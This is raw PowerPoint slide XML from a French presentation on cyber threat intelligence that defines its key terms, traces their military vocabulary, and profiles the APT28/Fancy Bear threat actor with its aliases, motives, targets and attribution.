              </a:rPr>
              <a:t>Identification des adversaires (« </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Threat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Actors »)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5F2B245-FF87-EAC6-2299-4777F3C0E906}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="186312" y="1990849"/>
            <a:ext cx="8771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a. Utilisation des </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>règles de nommage </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(partage des information tactiques et opérationnelles)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>b. Utilisation du </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>langage estimatif </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>avec des niveaux de confiance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9AD175-2C60-C3F7-53B4-0A2CE473BE0A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="186312" y="1990849"/>
            <a:ext cx="8771376" cy="729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75EB284-0DAD-20B8-8DD1-8E1CDF0C0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91" y="4201923"/>
            <a:ext cx="3369521" cy="18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66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Qu'est-ce qu'un nom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3678849"/>
            <a:ext cx="1514385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Lrenseignement sur les cybermenacesorem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EA6846-F105-E278-76A2-79B78F183E5F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="395536" y="1642741"/>
            <a:ext cx="810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Adversaire connu aussi sous le nom de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Fancy Bear </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CrowdStrike</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Sednit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(ESET), </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" b="1" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>PawnStorm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>TrendMicro</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>),</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Sofacy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t> (Sophos) ,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Strontium</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t> (Microsoft) ou </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Group74</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t> (Cisco)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4423744-A0AA-6849-9081-F3296DE0F541}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="405370" y="23740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Active depuis </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2008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44B01A-8C5C-AD68-2ADF-7E6D39C32ED4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="405370" y="2738818"/>
            <a:ext cx="444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935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Motivations principales </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: espionnage externe </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>et interne, opération d’influence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C6FAA2-741F-39CC-5D86-C6E46176009D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="444567" y="3457870"/>
            <a:ext cx="504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935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Cibles</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t> : forces armées, l'industrie de la défense,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>les médias, les hommes politiques et les dissidents.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44D626-57CD-C45B-E95E-598F6A8A5B8A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1733017" y="5273000"/>
            <a:ext cx="565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Attribué à </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>l’Unité 26165 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>du 6</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" i="1" baseline="30000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ème</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Direction (SIGINT) du GRU</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>        https://www.justice.gov/file/1080281/download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E9D373F-2BC2-4D31-6BAD-5AB34E367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34" y="2424992"/>
            <a:ext cx="2664296" cy="27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6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Discours martial – pourquoi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9EBE25-CBE2-FFB5-586C-7CD8033775AA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="971600" y="2276872"/>
            <a:ext cx="5384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rgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Cyber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="4000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="4000" dirty="0" err="1"/>
              <a:t>Threat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="4000" dirty="0"/>
              <a:t> Intelligence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C634FF-62A6-F9FF-E0B8-0A44EFEF51A7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="580945" y="3746317"/>
            <a:ext cx="7924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« Cybernétique » - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800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désigne l'étude des systèmes de communication et de contrôle.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="935AE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i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE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fr-FR" sz="1800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ouramment utilisé pour décrire tout ce qui est lié au cyberespace, </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE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la cybersécurité et à la technologie numérique</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="935AE9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6046EFD-5400-BC90-C239-D66168D65681}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1593323" y="2870027"/>
            <a:ext cx="0" cy="876290"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="57150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56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Discours martial – pourquoi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9EBE25-CBE2-FFB5-586C-7CD8033775AA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="971600" y="2276872"/>
            <a:ext cx="5384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Cyber </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="4000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Threat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="4000" dirty="0"/>
              <a:t> Intelligence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6046EFD-5400-BC90-C239-D66168D65681}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3037917" y="2924944"/>
            <a:ext cx="0" cy="876290"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="57150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4BFABBC-0DC8-2CD5-F88B-DF91CDB5574B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="323528" y="3873243"/>
            <a:ext cx="7865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En stratégie militaire « </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>menace</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t> » = une entité, une force ou une action susceptible </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>de causer des dommages</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="935AE9"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Définit la notion d’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>adversaire</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t> comme force hostile</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="226087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Discours martial – pourquoi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9EBE25-CBE2-FFB5-586C-7CD8033775AA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="971600" y="2276872"/>
            <a:ext cx="5384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rgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Cyber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935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Threat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="4000" dirty="0"/>
              <a:t> Intelligence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C634FF-62A6-F9FF-E0B8-0A44EFEF51A7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="323528" y="3735446"/>
            <a:ext cx="86966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Dans le contexte de la cybersécurité « </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cybermenace</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t> » = tout danger ou préjudice potentiel </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>que des </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>adversaires</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t> (acteurs malveillants) ou des événements perturbateurs font peser sur </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>des systèmes informatiques, des réseaux, des données ou des individus.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="935AE9"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>« </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>threat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>actors</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t> » = adversaires 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6046EFD-5400-BC90-C239-D66168D65681}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1593323" y="2870027"/>
            <a:ext cx="0" cy="876290"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="57150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08D60F6-8392-BE66-A5C6-803EE2C4DCD6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2915816" y="2870027"/>
            <a:ext cx="0" cy="876290"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="57150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7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Discours martial – pourquoi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9EBE25-CBE2-FFB5-586C-7CD8033775AA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="971600" y="2276872"/>
            <a:ext cx="5384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Cyber </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="4000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="222A35"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Threat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935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Intelligence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6046EFD-5400-BC90-C239-D66168D65681}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5148064" y="2996953"/>
            <a:ext cx="0" cy="876290"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="57150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F726CFFF-7522-7D4C-F5CB-D9FBCEAB431F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="628650" y="3950700"/>
            <a:ext cx="81014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« Intelligence » n’est pas un trait psychologique ( intelligence, perspicacité, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>mais « </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>renseignements</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t> »</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="935AE9"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t> La collecte, l'analyse et l'interprétation d'informations sur les adversaires potentiels,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>et leur environnement opérationnel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12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Discours martial – pourquoi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9EBE25-CBE2-FFB5-586C-7CD8033775AA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="971600" y="2276872"/>
            <a:ext cx="6654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         </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="4000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Cyber </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="4000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Threat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="4000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Intelligence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6046EFD-5400-BC90-C239-D66168D65681}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4427984" y="2990855"/>
            <a:ext cx="0" cy="876290"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="57150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F726CFFF-7522-7D4C-F5CB-D9FBCEAB431F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1065953" y="3978930"/>
            <a:ext cx="64653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La définition gravite autour des concepts de menace et adversaires </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>et dénote un positionnement </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>conflictuel</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" b="1" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="935AE9"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Héritage explicit du vocabulaire de la stratégie militaire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708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Discours martial – pourquoi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09;06.2023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 Team@oodrive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2524687"/>
            <a:ext cx="1514385" cy="35548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fr-FR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Processus de collecte, d'analyse, de distribution et d'échange d'informations sur les adversaires et les cyberattaques, utilisé pour renforcer la cybersécurité.</a:t>
            </a:r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9EBE25-CBE2-FFB5-586C-7CD8033775AA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="971600" y="2276872"/>
            <a:ext cx="6654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         </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="4000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Cyber </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="4000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Threat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="4000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Intelligence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6046EFD-5400-BC90-C239-D66168D65681}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4427984" y="2990855"/>
            <a:ext cx="0" cy="876290"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="57150">
            <a:solidFill>
              <a:srgbClr val="935A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F726CFFF-7522-7D4C-F5CB-D9FBCEAB431F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1065953" y="397893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1E4CF1-9882-E2A5-27C9-9C39A829F372}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="781010" y="3966637"/>
            <a:ext cx="82615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rgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Processus de collecte, d'analyse, de distribution et d'échange d'informations sur </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>les adversaires et les cyberattaques, utilisé pour renforcer la cybersécurité.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="935AE9"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="935AE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Le concept de « </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" i="1" dirty="0">
                <a:solidFill>
